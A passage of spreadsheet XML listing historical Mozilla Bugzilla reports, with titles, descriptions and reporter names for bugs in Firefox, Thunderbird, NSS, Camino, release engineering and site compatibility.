Relevant portion of the log attached.  This is not an issue when
--without-system-nspr is used only --with-system-nspr</t>
  </si>
  <si>
    <t>CORE-250691</t>
  </si>
  <si>
    <t>Disable LMv1 hash by default</t>
  </si>
  <si>
    <t>Disable LMv1 hash by default.  Allow it to be enabled via a hidden pref.
See bug 231529 comment #28 for justification.  Exerpt here:
Andrew Bartlett wrote:
&gt; For a site to only have an LM password on record means that they:
&gt; - Cannot use NTLM2 and must have specificly configured all member servers 
&gt;   and proxies etc not to negotiate use of it
&gt;
&gt; - Must have changed that user's password from a Win95 machine with a
&gt;   particularly old password change call.
&gt;or
&gt; - Must never have changed that password since running 'Lan Manager' 10 years
&gt;ago (or for Samba PDCs since running a very old version of Samba).
&gt;
&gt;I think it's safe to assume the presence of the NT password hash.</t>
  </si>
  <si>
    <t>darin.moz</t>
  </si>
  <si>
    <t>CALENDAR-527057</t>
  </si>
  <si>
    <t>Port |Bug 519357 - Only load known binary components from app directory| to comm-central</t>
  </si>
  <si>
    <t>Created as a clone of Bug 526760 for Sunbird (comm-central)
We need to package bin\components\components.list to ensure that toolkit and calendar components can be loaded from components directory.</t>
  </si>
  <si>
    <t>mschroeder</t>
  </si>
  <si>
    <t>BUGZILLA-285193</t>
  </si>
  <si>
    <t>documentation+pdf landfill tinderbox is a false green</t>
  </si>
  <si>
    <t>Despite being green the documentation+pdf landfill tinderbox is actually
failing to produce any builds. This is an install running the generation of PDF
documentation under xmlto but is not picking up the error message that is being
thrown
   Error: pdfxmltex (file pdftex.cfg): cannot open config file
This also fails for me at the shell prompt with the same error.</t>
  </si>
  <si>
    <t>mozilla+bmo</t>
  </si>
  <si>
    <t>CORE-505959</t>
  </si>
  <si>
    <t>ExtractCurrentFrame should not create an imgContainer</t>
  </si>
  <si>
    <t>Now that bug 753 has landed we have an imgIContainer method ExtractCurrentFrame which creates a new imgIContainer with 1 internal frame sourced from the currently active frame within the original container and cropped to the desired size. This is currently only used by borderImage which more or less just extracts part of the frame calculates some rectangles and coordinates and draws it.
In my decode-on-draw work (bug 435296) I do quite a bit of re-architecting in imgContainer. The design philosophy is that imgContainer should map an encoded image (like a jpeg or png) to decoded frames storing the source data from decode-on-draw or discard-redecode if necessary. This works great most of the time but the one case where it doesn't is ExtractCurrentFrame because there's no source data and no mimetype. The patch currently kludges things to pass in an empty mimetype and do some special handling but this ideally should go away.
Thus I propose that we make a different class called something like imgFrameContainer (anyone have a better name?) which of course also implements imgIContainer and has slimmed down internals for more or less just wrapping a single frame. This separates the two uses and doesn't publicly expose any 'frame-ish' datatype which joe would be against.
I'll probably start work on this soon after bug 435296 lands.
Comments?</t>
  </si>
  <si>
    <t>bobbyholley</t>
  </si>
  <si>
    <t>CORE-345142</t>
  </si>
  <si>
    <t>Chatzilla leaks its chrome (again)</t>
  </si>
  <si>
    <t>As in bug 343417... using dbaron's leak logging just starting chatzilla (seamonkey -chat) and closing it leaks most of the chrome:
Leaked 6 out of 6 DOM Windows
Leaked 18 out of 22 documents
Leaked 0 out of 3 docshells
This re-regressed between 2006-07-12-09-trunk and 2006-07-13-10-trunk.  I'll play CVS-by-date if I get the chance.</t>
  </si>
  <si>
    <t>CORE-160377</t>
  </si>
  <si>
    <t>Preferences: Backend</t>
  </si>
  <si>
    <t>Prefs should have a dirty flag to avoid redundant prefs file saves</t>
  </si>
  <si>
    <t>There's no way at the moment to tell if the prefs have been changed since the
last save to disk so that we can't avoid doing redundant and expensive file saves.
It would be useful to have something on the pref API that allows embedders to
tell if the prefs are dirty. Furthermore perhaps a 'mod count' or numeric value
could be used so that callers can tell if the prefs have changed since some
previous time. Implementation would just incrememnt this value on every pref
change and set it to 0 on successful file save.</t>
  </si>
  <si>
    <t>alecf</t>
  </si>
  <si>
    <t>SEAMONKEY-381186</t>
  </si>
  <si>
    <t>Edit Form Info doesn't work in suiterunner builds</t>
  </si>
  <si>
    <t>Edit form info isn't working and we'd like to keep this working even if we only use wallet for nightly builds (i.e. its dropped by the time we do a release). Opening the edit form info page gives:
Error: uncaught exception: Permission denied to get property ChromeWindow.initPanel
Neil has a patch for this...</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-261576</t>
  </si>
  <si>
    <t>mail.yahoo.com - browser attempts to download 'login' as application/octet-stream instead of displaying mail summary</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040911 Firefox/0.10 (Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0))
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040911 Firefox/0.10 (Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0))
I attempt to log into my Yahoo Mail account. Instead of taking me to the main
page the download window comes up...
Opening login
You have chosen to open login
which is a application/octet-stream
from: http://us.f530.mail.yahoo.com/ym/
There is the option to open with or save to disk.
Reproducible: Always
Steps to Reproduce:
1. go to mail.yahoo.com
2. enter login and password
3. Click submit
Actual Results:  
The download window appears with the following 
Opening login
You have chosen to open login
which is a application/octet-stream
from: http://us.f530.mail.yahoo.com/ym/
There is the option to open with or save to disk.
The word login in bold has a windows mapped network drive icon on it. (Little
case with a t-shaped wire exiting from the botton and a yellow dot where the
cables intersect)
Expected Results:  
Should have taken me to the default Yahoo Mail index... the summary page.
Running Firefox 1.0PR
Did not use the installer... decompressed the zip file containing the binaries.
The profile was created from scratch in 0.8 and was subsequently imported.
I deleted the old files and decompressed the new ones in their place.
Profile is on a network share.
The import window didn't come up. It just used my profile straight out.
The issue first occurred with the version of 0.9 I was running. 
Machine:
Pentium 4
512 Ram
Windows 2000 Sp4</t>
  </si>
  <si>
    <t>corporaldan11</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-345552</t>
  </si>
  <si>
    <t>Remove a pre-panther check</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/mozilla/source/camino/src/browser/BrowserWindowController.mm#934</t>
  </si>
  <si>
    <t>peter.a.jaros</t>
  </si>
  <si>
    <t>froodian</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-416749</t>
  </si>
  <si>
    <t>Wrapping fails when line is made up of small blocks of processed (e.g. colored) text</t>
  </si>
  <si>
    <t>If you say %C8YELLO! lots of times without spaces it wont wrap. We generate lots of s for the colours but with no space or  between they wont wrap.
Proposed solution: add a  after each styled .</t>
  </si>
  <si>
    <t>krishean</t>
  </si>
  <si>
    <t>NSPR-15694</t>
  </si>
  <si>
    <t>NSPR include file cleanup for building on Mac</t>
  </si>
  <si>
    <t>I did some header cleanup so that building NSPR on Mac gives fewer errors when
'Require function prototypes' is turned on. NSPR still fails to build when
this compiler option is on which is worrying it prevents the compiler from
doing parameter checking. By turning this option on I found a number of
benign errors in the arguments to various Mac Toolbox functions.
I added new headers in pr/srd/md/mac/:
macdll.h
mactime.h
macio.h
mdmac.h
macthr.h
I included the appropriate ones of these to get function prototypes in
macthr.c
mactime.c
macsockotpt.c
macio.c
mdmac.c
macdll.c
prlink.c
These checkins can be examined by searching for checkins by sdagley to the NSPR
module on 10/5/99.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_METRO_GRAVEYARD-856008</t>
  </si>
  <si>
    <t>Move ContentAreaObserver out of browser.js and clean the code up a bit</t>
  </si>
  <si>
    <t>jmathies</t>
  </si>
  <si>
    <t>CORE-168508</t>
  </si>
  <si>
    <t>Further improvement to xpcom/reflect/xptcall/src/md/unix/xptcstubs_gcc_x86_unix.cpp</t>
  </si>
  <si>
    <t>Bug 140412 wasn't closed with the latest greatest patch. It seems a waste to
lose it so I'll attach a new patch against the current code.</t>
  </si>
  <si>
    <t>tenthumbs</t>
  </si>
  <si>
    <t>CORE-495002</t>
  </si>
  <si>
    <t>nsPresContext ought to have CSSPixelsToDevPixels and DevPixelsToCSSPixels methods</t>
  </si>
  <si>
    <t>They're just AppUnitsToDevPixels âˆ˜ CSSPixelsToAppUnits and AppUnitsToCSSPixels âˆ˜ DevPixelsToAppUnits respectively so it's not much more than an annoyance. It's already got every other combination though so why not this one?</t>
  </si>
  <si>
    <t>db48x</t>
  </si>
  <si>
    <t>CORE-374251</t>
  </si>
  <si>
    <t>style.fontFamily overflow on osx</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a3pre) Gecko/20070316 Minefield/3.0a3pre
an overflow in this.document.firstChild.style.fontFamily value causes a crash with some register control on OSX.  Does not appear to affect win32.
found via javascript introspection fuzzing.  see attached crash dump + sample script
Reproducible: Always
Steps to Reproduce:
1. run attached script
Actual Results:  
crash with some register control
see attached items</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-370746</t>
  </si>
  <si>
    <t>Buildbot -- New BonsaiPoller test case</t>
  </si>
  <si>
    <t>This patch adds a test case to the BonsaiPoller to ensure that it can still processes changes an InvalidResultError occurs.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-196688</t>
  </si>
  <si>
    <t>Dutch</t>
  </si>
  <si>
    <t>kijkshop.nl - Menu displayed on the left doesn't work in mozilla It does work on opera and IE 6</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.4a) Gecko/20030309
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.4a) Gecko/20030309
The menu showing on the left does not work. It should show submenu's on mouseover.
This does work on other browsers like IE and opera 7
Reproducible: Always
Steps to Reproduce:
1.Load www.kijkshop.nl
2.try out the menu on the left.
3.
Actual Results:  
Nothing while it should show submenus on mouseover
Expected Results:  
Show the submenu's</t>
  </si>
  <si>
    <t>dutch</t>
  </si>
  <si>
    <t>rw.jonker</t>
  </si>
  <si>
    <t>TOOLKIT-418243</t>
  </si>
  <si>
    <t>Removing active autocomplete textbox breaks all autocomplete functionality</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en rv:1.8.1.12pre) Gecko/20080206 Camino/1.6b3pre (like Firefox/2.0.0.12pre)
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b4pre) Gecko/2008021804 Minefield/3.0b4pre
Removing an autocomplete textbox with an active results popup breaks all autocomplete functionality browser-wide.
This occurs with any autocomplete textbox not just rich-text search history ones. It's possible to reproduce the error without the popup box being open (though still by removing the textbox) but this is the most reliable method.
This has been an issue on the trunk since at least September 2006.
Reproducible: Always
Steps to Reproduce:
1. Install attached XPI.
2. Load chrome://autocompletebreaker/content/test.xul
3. Click top textbox enter a letter so some autocomplete results show in the popup list press the down arrow to select one of the results (without hitting Enter) and click outside the textbox. The top textbox should disappear due to a removeChild() call in the blur() handler.
4. Click in the second textbox.
Actual Results:  
Error: uncaught exception: [Exception... Component does not have requested interface arg 0 [nsIAutoCompleteController.input]  nsresult: 0x80004002 (NS_NOINTERFACE)  location: JS frame :: chrome://global/content/bindings/autocomplete.xml :: attachController :: line 265  data: no]
Autocomplete is then broken program-wide and the address bar no longer functions.
Expected Results:  
Textbox element should be removed without error.
This might be the same problem behind bug 404135.</t>
  </si>
  <si>
    <t>dan-bugzilla</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-250275</t>
  </si>
  <si>
    <t>beursbox.nl - part of the page is not displayed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
In the page www.beursbox.nl all the selection buttons in the left panel of the
page are missing.
IE6.0 shows them allright.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>verhoeven.l</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-288177</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD</t>
  </si>
  <si>
    <t>Get rid of embed-sample.jar for toolkit apps</t>
  </si>
  <si>
    <t>Sunbird doesn't need embed-sample.jar Firefox doesn't want it according to bug
171082 comment 10 and I guess Thunderbird also wants to go without it.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-405748</t>
  </si>
  <si>
    <t>esc key does not stop animation in animated gifs</t>
  </si>
  <si>
    <t>Pressing the esc key does not stop the animation in animated gifs.
(esc key should also stop aPNG I think)
Spin off from bug 379199 (see bug 379199 comment 5 and bug 379199 comment 26).
Regressed somewhere around April 15 2007. I'll try to find out a better regression range later.</t>
  </si>
  <si>
    <t>phiw2</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-184228</t>
  </si>
  <si>
    <t>Spelling error in irc.js: function net_conenct().</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021115
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3a) Gecko/20021115
This doesn't seem to dramatically affect anything.The spelling error is right here:
     CIRCNetwork.prototype.connect =
     function net_conenct()
     {...}
I'd imagine that conenct should be connect .
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>justinarthur</t>
  </si>
  <si>
    <t>CORE-415440</t>
  </si>
  <si>
    <t>nsIPopupBoxObject#setConsumeRollupEvent has no effect on Mac OS X</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 
In Firefox 3 nsIPopupBoxObject has a new setConsumeRollupEvent method which
enables to decide whether outside clicks of popup should be consumed or not.
However the method has no effect on Mac OS X.
Reproducible: Always
Steps to Reproduce:
1.Open the subsequent testcase.
2.Click [ROLLUP_NO_CONSUME] button to open popup.
3.Click [TEST] button during popup display.
Actual Results:  
Platform-dependent.
- Windows: Popup closes and alert dialog opens.
- Linux  : Popup closes and alert dialog opens.
- MacOSX : Popup closes but alert dialog does not open.
Expected Results:  
Popup closes and alert dialog opens on all platforms.
Clicks outside of a popup should NOT be eaten when we use
nsIPopupBoxObject#setConsumeRollupEvent(Ci.nsIPopupBoxObject.ROLLUP_NO_CONSUME).</t>
  </si>
  <si>
    <t>gomita</t>
  </si>
  <si>
    <t>MOZILLA.ORG-392946</t>
  </si>
  <si>
    <t>Need read/write (rw) access to /libs/product-details/ in svn</t>
  </si>
  <si>
    <t>Thanks to clouserw we're moving the product details junk out of the main website and into a separate library that can be used by multiple mozilla websites. Since it's not under /projects/mozilla.com/ though I need rw access added for me to /libs/product-details/ in svn so I can continue to act on behalf of release/website-drivers for prepping releases on the various websites. Thanks!</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-500699</t>
  </si>
  <si>
    <t>deploy puppet client on production machines</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-734914</t>
  </si>
  <si>
    <t>CIDuty</t>
  </si>
  <si>
    <t>talos-r3-fed-038 problem tracking</t>
  </si>
  <si>
    <t>NSS-166781</t>
  </si>
  <si>
    <t>'r2' may be used uninitialized in signtool/sign.c</t>
  </si>
  <si>
    <t>When compiling NSS with gcc on Linux we get these
warnings in signtool/sign.c:
sign.c: In function `generate_SF_file':
sign.c:675: warning: `r2' might be used uninitialized in this function
sign.c:678: warning: `name' might be used uninitialized in this function
The second warning (about 'name') is benign and can
be ignored.  The first warning (about 'r2') is correct.
It is not obvious if it's serious and how to fix it.
'r2' is set inside this while loop:
    while (fgets (buf BUFSIZ mf))
      {
      if (*buf == 0 || *buf == '\n' || *buf == '\r')
        break
      line++
      /* Ending range for hashing */
      r2 = ftell (mf)
      }
If we never enter the body of the while loop or we
break out of it in the first iteration 'r2' won't
be set.
(This bug refers to rev. 1.5 of signtool/sign.c.)</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-521428</t>
  </si>
  <si>
    <t>Port |Bug 518124 - Package content_canvas.xpt| to comm-central (apps)</t>
  </si>
  <si>
    <t>SeaMonkey needs it.
Note that Thunderbird patch in bug 514665 is wrong in that m-1.9.2 too still needs the old files!
(Fwiw I'm not sure if calendar should be updated too or not...)</t>
  </si>
  <si>
    <t>SEAMONKEY-231384</t>
  </si>
  <si>
    <t>global objects don't go away when closing window</t>
  </si>
  <si>
    <t>We're leaking in cases where global objects (for chrome not for the content
window inside) don't go away because JS objects implementing observers weren't
removed.  This causes problems in two ways:
 * if the observers are held by something global (e.g. the pref service) they
never go away
 * if the observers are held by something in the chrome's content it takes an
extra cycle of GC for them to go away since they're still rooted until after
the first cycle of GC when the content is destroyed</t>
  </si>
  <si>
    <t>THUNDERBIRD-362133</t>
  </si>
  <si>
    <t>Rename Go Back / Go Forward buttons to Back and Forward</t>
  </si>
  <si>
    <t>Arvid and I talked about this for a while and decided to use Back and Forward.</t>
  </si>
  <si>
    <t>THUNDERBIRD-673880</t>
  </si>
  <si>
    <t>Port Bug 406026 - Consider allowing the blocklist url to direct to a particular point in the blocklist</t>
  </si>
  <si>
    <t>Created attachment 548137
The fix
+++ This bug was initially created as a clone of Bug #406026 +++
Bug 406026 implemented pointing blocklisted extensions to specific detail pages on AMO. We need to have the preferences updated for Thunderbird otherwise users clicking on the blocklist link just get nothing.
Note that I'm not convinced extensions.blocklist.detailsURL is actually used still but I'll update it anyway.</t>
  </si>
  <si>
    <t>FIREFOX-381280</t>
  </si>
  <si>
    <t>Places bookmarks.html importer ignores browser.bookmarks.file pref</t>
  </si>
  <si>
    <t>The Places bookmarks.html importer ignores the browser.bookmarks.file pref.
I've set that pref like this in my prefs.js:
user_pref(browser.bookmarks.file f:\\bookmarks.html)
That's the location of my bookmarks file (which I use for both my Windows and my Linux profiles and which works just fine in non-places-bookmarks builds).
After updating to the places-bookmarks-enabled nightly (Windows 2007051904) Minefield presented me the profile's default bookmarks (Getting Started Latest Headlines etc.).
It should have imported my own bookmarks from the above mentioned location.
Workaround is to import manually:
Menu Bookmarks -&gt; Bookmarks Manager -&gt; Menu File -&gt; Import.</t>
  </si>
  <si>
    <t>jminta</t>
  </si>
  <si>
    <t>steffen.wilberg</t>
  </si>
  <si>
    <t>SOCORRO-977134</t>
  </si>
  <si>
    <t>Webapp</t>
  </si>
  <si>
    <t>Super Search with dates doesn't work</t>
  </si>
  <si>
    <t>Yesterday I wanted to find the list of build IDs associated with a certain signature on Nightly and as the report/list Table tab doesn't work as expected right now I tried to find out with Super Search.
This is the URL I tried:
https://crash-stats.mozilla.com/search/?version=30.0a1&amp;signature=%3Djs%3A%3Ajit%3A%3AInlineFrameIteratorMaybeGC%3Cint%3E%3A%3AfindNextFrame%28%29&amp;date=%3E2014-01-01+00%3A00%3A00&amp;_facets=build_id&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform
Unfortunately that doesn't work and the error message is very unhelpful as it doesn't tell what's wrong anyhow.
Without the date it works:
https://crash-stats.mozilla.com/search/?version=30.0a1&amp;signature=%3Djs%3A%3Ajit%3A%3AInlineFrameIteratorMaybeGC%3Cint%3E%3A%3AfindNextFrame%28%29&amp;_facets=build_id&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform
So something is wrong with the date field there.</t>
  </si>
  <si>
    <t>THUNDERBIRD-381595</t>
  </si>
  <si>
    <t>Message filters do not run automatically</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070522 Minefield/3.0a5pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070522 Thunderbird/3.0a1pre ID:2007052204 [cairo]
After downloading mails some of them get directly sorted into specific mail folders e.g. all Bugzilla-mails into 'Bugzilla'-folder. This worked fine until today's trunk build. Now message filters need to get started manually (Run filters on folder).
Reproducible: Always
Steps to Reproduce:
1. Download mails with filter rule on it
2.
3.
Actual Results:  
Mail remains in Inbox.
Expected Results:  
Mail should be moved automatically to the specified folder.
Seems to be an trunk issue as it is reported also for today's Seamonkey trunk build.</t>
  </si>
  <si>
    <t>toscha</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-388976</t>
  </si>
  <si>
    <t>[1.1] Support conditional actions (i.e. the `if` attribute)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: 0.8.0.3
XForms 1.1 supports a general-purpose `if` attribute on all actions.  This attribute is an XPath expression that is evaluated and interpreted as a boolean value before the parent action is performed.  If the value is false then the action is not performed.  The reference to the specification (last call working draft as of this writing) is:
http://www.w3.org/TR/xforms11/#action-conditional
This bug report represents a request that this feature be implemented.
Reproducible: Always</t>
  </si>
  <si>
    <t>jlc6</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-162756</t>
  </si>
  <si>
    <t>Pops up a this is best viewed with IE 5.0 or above</t>
  </si>
  <si>
    <t>I tried following all the twisty passages to find the JS that puts this up
and couldn't.  They construct URL's using obfuscated JS code.
Popular TV listings site.</t>
  </si>
  <si>
    <t>susiew</t>
  </si>
  <si>
    <t>rjesup</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-524822</t>
  </si>
  <si>
    <t>verification email not passing through</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en rv:1.9.1.4pre) Gecko/20080528 Epiphany/2.22 Firefox/3.5
Build Identifier: http://wiki.mozilla.org on 2009-10-26
The email message for verifcation doesn't pass through to my inbox.
I have registered with the address imz@altlinux.org. I also separately requested a verification email yesterday. 
I guess that the email from your wiki software doesn't pass through a filter on our
incoming mail server probably a kind of greylisting filter.
Could you please investigate my case and also report this problem to
the wiki software developers or the developers of the mailing
software you use so that there will be no analoguous problems on
other sites using the same wiki or mailing software in the future.
Reproducible: Always
Steps to Reproduce:
1. register at http://wiki.mozilla.org with an address hosted at altlinux.org
2. wait for the verifcation email or request a new one on the Preferences page
3.
Actual Results:  
No message from wiki.mozilla.org arrives.
Expected Results:  
It arrives.</t>
  </si>
  <si>
    <t>imz</t>
  </si>
  <si>
    <t>FIREFOX-332271</t>
  </si>
  <si>
    <t>One cause of wrong tab closure identified in tab closure handling (Ctrl+F4 bubbles although being handled)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
I don't know if this is the cause of all the time I've had a desired tab close when I wasn't expecting it but it's a confirmed cause of many of them and needs fixing.
Suppose you open a new tab. A blank tab appears and the focus is taken to the address bar for entry of the desired address. Whilst entering the address you decide actually you don't need that page after all. So you close it with the normal key combination for close tab.
Then not only your new blank tab is closed but also the NEXT tab is closed as well. If you only had one tab open prior to the above FF itself shuts down too.
It is obvious that logically what has happened is that the edge case where the current tab is newly displayed blank but no web page has yet loaded into it is not correctly processed in the close tab function.
Reproducible: Always
Steps to Reproduce:
See above.
Actual Results:  
See above. 
A second tab is closed that was not directed to be closed. Data is lost.
Expected Results:  
Existing valid tabs should not close when the current tab is closed.
I have also had many cases (harder to reproduce) where a current tab being worked on has closed and pathologically a second previous tab has closed too. Most of these were not new tabs. So probably there is a second bug in this function with similar effect. Please when rechecking this function look for other cases by which a 2nd tab might accidentally be closed when the close-tab function is used.</t>
  </si>
  <si>
    <t>zeniko</t>
  </si>
  <si>
    <t>contactbox</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-162394</t>
  </si>
  <si>
    <t>Venkman JS Debugger</t>
  </si>
  <si>
    <t>When user sets Don't Debug Eval/Timeouts don't stop in functions called from timeouts either -</t>
  </si>
  <si>
    <t>I came across a site using this type of code:
function f()
{ 
  setTimeout(f() DELAY)
}
When I tried to debug the site I tried to avoid falling
into this so I could get to the function I was interested in.
So I set 
         File Options &gt; Don't Debug Eval/Timeouts
However it seemed to me that Venkman still kept returning
to the function f() over and over. This prevented me from 
getting to the interesting function. 
I will attach a reduced testcase below where f() is called from the
onLoad() event of the body and the onClick() event of a button.</t>
  </si>
  <si>
    <t>pschwartau</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-160790</t>
  </si>
  <si>
    <t>Patch for various memory leaks</t>
  </si>
  <si>
    <t>This is a rather trivial patch: in several places there are dealloc methods which don't call 
[super dealloc]. In one case [super dealloc] is being called then a member var is used 
afterwards. Usually this will work but there is no gurantee that the memory is still valid 
after a dealloc (and if certain debugger settings are one memory will be scrambled and 
we are guranteed that dealloc *will* change the memory previously occupied by the 
object).</t>
  </si>
  <si>
    <t>mikepinkerton</t>
  </si>
  <si>
    <t>MOZILLA_LABS-516622</t>
  </si>
  <si>
    <t>Jetpack Prototype</t>
  </si>
  <si>
    <t>jetpack.selection appears to be broken</t>
  </si>
  <si>
    <t>with the new 0.5 version of Jetpack my own dictcc-slidebar (based on
the Wikipedia Slidebar) stopped working correctly.
Something with the selection of text on a webpage broke because the
selection text isn't brought over to the iframe holding the mobile
version of dict.cc anymore.
Here's the code which works fine for Jetpack 0.4:
-----------------------------------------------------
jetpack.future.import(selection)
jetpack.future.import(slideBar)
jetpack.slideBar.append({
       icon: http://www.dict.cc/favicon.ico
       width: 300
       persist: true
       html: 'scrollbar * {display: none !important}&lt;iframe
class=frame height=99% width=100%
src=http://pocket.dict.cc/?s=&gt;'
       onReady: function(slide) {
               jetpack.selection.onSelection(function() {
                       $(.frame slide.contentDocument).attr(src
http://pocket.dict.cc/?s= + jetpack.selection.text)
               })
       }
})
-----------------------------------------------------
I had a look at the respective selection JEP and I'm currently stumped
for where the error lies. Any hints are appreciated!</t>
  </si>
  <si>
    <t>azaaza</t>
  </si>
  <si>
    <t>WEB_COMPATIBILITY-394274</t>
  </si>
  <si>
    <t>video.cwtv.com - sniffs for Firefox</t>
  </si>
  <si>
    <t>Using Seamonkey 1.1.4 I get the following message:
We're sorry but only the following browsers are supported on your operating system at this time:
Microsoft Internet Explorer 5.5 or later
Mozilla Firefox 1.5 or later
Please check back soon for support for other browsers.</t>
  </si>
  <si>
    <t>abwillis1</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-711064</t>
  </si>
  <si>
    <t>puppet busted for linux64 slaves</t>
  </si>
  <si>
    <t>warning: Not using cache on failed catalog
warning: Configuration could not be instantiated: Could not find dependency Package[nrpe] for File[/etc/nagios/nrpe.cfg] at /etc/puppet/manifests/modules/nagios/manifests/service.pp:46
the problem came from 
http://hg.mozilla.org/build/puppet-manifests/diff/0dd0d25dac61/modules/nagios/manifests/service.pp#l1.20
the fix is to either use consistent package names in puppet or to switch on slaveType in this block like we do below.</t>
  </si>
  <si>
    <t>SEAMONKEY-142042</t>
  </si>
  <si>
    <t>Image right-click Create Link is inconsistent with other ways of adding a link</t>
  </si>
  <si>
    <t>When right-clicking an image one option is Create Link.  The problem is that
this creates a different dialog box from that which is used for all other ways
of adding a link:
   1 - Right-click image select Image and Link Properties and 
       then use the Link tab.
   2 - Double-click image and then use the Link tab.
   3 - Format &gt; Image and Link Properties and then use the Link tab.
The three normal methods above result in a dialog box which has an option
called Show border around linked image.  But the dialog box which results from
Right-click &gt; Create Link does not have this option.
This is a separate matter from the following problems but I will mention them
here anyway:
1 - Bug 99541 where it is noted that Create Link is available even if 
    the image has a link already.  Also how it might be best to replace it
    with Remove Link.
2 - A forthcoming bug from me regarding borders around images after a link
    has been added.  I will mention it here when I create it.</t>
  </si>
  <si>
    <t>cmanske</t>
  </si>
  <si>
    <t>rw</t>
  </si>
  <si>
    <t>SEAMONKEY-306844</t>
  </si>
  <si>
    <t>update chrome-versions.sh for trunk and 1.8 branch</t>
  </si>
  <si>
    <t>As long as we had no releases of the code happening it seemed OK to leave
http://lxr.mozilla.org/mozilla/source/config/chrome-versions.sh untouched but
now we should update those versions.
We should update MOZILLA_LOCALE_VERSION and MOZILLA_REGION_VERSION to 1.8b4 on
branch and 1.9a1 on trunk and due to the recent scrollbar stuff that broke all
existing themes I guess we should even update MOZILLA_SKIN_VERSION to 1.8
Note that those are only used for products using the old (XPFE) chromereg the
new chromereg handles versioning through EM.
So this is basically a SeaMonkey-only bug (Camino shouldn't care too much).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-439983</t>
  </si>
  <si>
    <t>Push XULRunner 1.9RC3 to release</t>
  </si>
  <si>
    <t>XULRunner RC3 appears to be stable and now that Firefox has gone gold we need to do the same for XULRunner. I'm not sure what all needs to happen to push XULRunner RC3 to release but I assume it's more than copying some files.</t>
  </si>
  <si>
    <t>mark.finkle</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-419901</t>
  </si>
  <si>
    <t>buildmaster on qm-rhel02 needs to be restarted</t>
  </si>
  <si>
    <t>We've lost on logging on the machine and need to restart the build masters to turn it back on.  This will require tree closure to handle any talos redness.
While we're at it we should push bug 419071.</t>
  </si>
  <si>
    <t>CORE-197114</t>
  </si>
  <si>
    <t>htmlparser should use ReadSegments() to read DTDs</t>
  </si>
  <si>
    <t>Now that nsIUnicharInputStream supports ReadSegments() the htmlparser should be
using that to feed data to expat - since nsIUnicharInputStream has an internal
buffer this will avoid an extra copy.</t>
  </si>
  <si>
    <t>CORE-236919</t>
  </si>
  <si>
    <t>CSS Parsing and Computation</t>
  </si>
  <si>
    <t>[FIXr]CSS background images still displayed when Load Images is unchecked</t>
  </si>
